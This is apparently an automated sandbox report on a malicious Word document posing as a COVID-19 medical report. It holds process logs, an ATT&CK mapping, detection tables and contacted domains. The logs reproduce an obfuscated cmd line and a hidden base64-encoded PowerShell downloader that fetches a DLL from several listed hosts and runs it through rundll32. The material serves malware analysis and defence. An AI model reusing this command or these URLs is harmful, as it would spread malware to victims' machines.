Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338773 Sample: XP-9743 Medical report COVI... Startdate: 12/01/2021 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Antivirus detection for URL or domain 2->59 61 12 other signatures 2->61 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 23 2->17         started        process3 signatures4 75 Suspicious powershell command line found 14->75 77 Very long command line found 14->77 79 Encrypted powershell cmdline option found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 remediis.com 5.2.81.171, 443, 49165, 49166 ALASTYRTR Turkey 19->51 53 avadnansahin.com 109.232.216.177, 49167, 80 AEROTEK-ASTR Turkey 19->53 49 C:\Users\user\Kjl48kr49qm9ty9\S93E.dll, PE32 19->49 dropped 65 Powershell drops PE file 19->65 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 2 26->28         started        signatures11 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->73 31 rundll32.exe 1 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 1 31->34         started        process14 signatures15 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->63 37 rundll32.exe 1 34->37         started        process16 signatures17 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->67 40 rundll32.exe 1 37->40         started        process18 signatures19 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->69 43 rundll32.exe 1 40->43         started        process20 signatures21 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->71 46 rundll32.exe 1 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
XP-9743 Medical report COVID-19.doc19%VirustotalBrowse
XP-9743 Medical report COVID-19.doc14%ReversingLabsScript-Macro.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
11.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
12.2.rundll32.exe.280000.1.unpack100%AviraHEUR/AGEN.1110387Download File
7.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
14.2.rundll32.exe.270000.1.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
15.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
10.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
14.2.rundll32.exe.250000.0.unpack100%AviraHEUR/AGEN.1110387Download File
10.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
15.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
11.2.rundll32.exe.1e0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
13.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
13.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File

Domains

SourceDetectionScannerLabelLink
remediis.com2%VirustotalBrowse
avadnansahin.com2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://avadnansahin.com2%VirustotalBrowse
http://avadnansahin.com0%Avira URL Cloudsafe
http://hellas-darmstadt.de/cgi-bin/ZSoo/6%VirustotalBrowse
http://hellas-darmstadt.de/cgi-bin/ZSoo/100%Avira URL Cloudmalware
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://remediis.comp0%Avira URL Cloudsafe
http://solicon.us/allam-cycle-1c4gn/f5z/6%VirustotalBrowse
http://solicon.us/allam-cycle-1c4gn/f5z/100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://avadnansahin.com/wp-includes/w/0%Avira URL Cloudsafe
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://remediis.com0%Avira URL Cloudsafe
http://www.riparazioni-radiotv.com/softaculous/DZz/0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://www.starlingtechs.com/GNM/0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://remediis.com/t/gm2X/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
remediis.com
5.2.81.171
truetrueunknown
avadnansahin.com
109.232.216.177
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://avadnansahin.com/wp-includes/w/true
  • Avira URL Cloud: safe
unknown
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/true
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
    		high
    http://investor.msn.comrundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
      		high
      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmpfalse
        		high
        http://avadnansahin.compowershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmptrue
        • 2%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://hellas-darmstadt.de/cgi-bin/ZSoo/powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmptrue
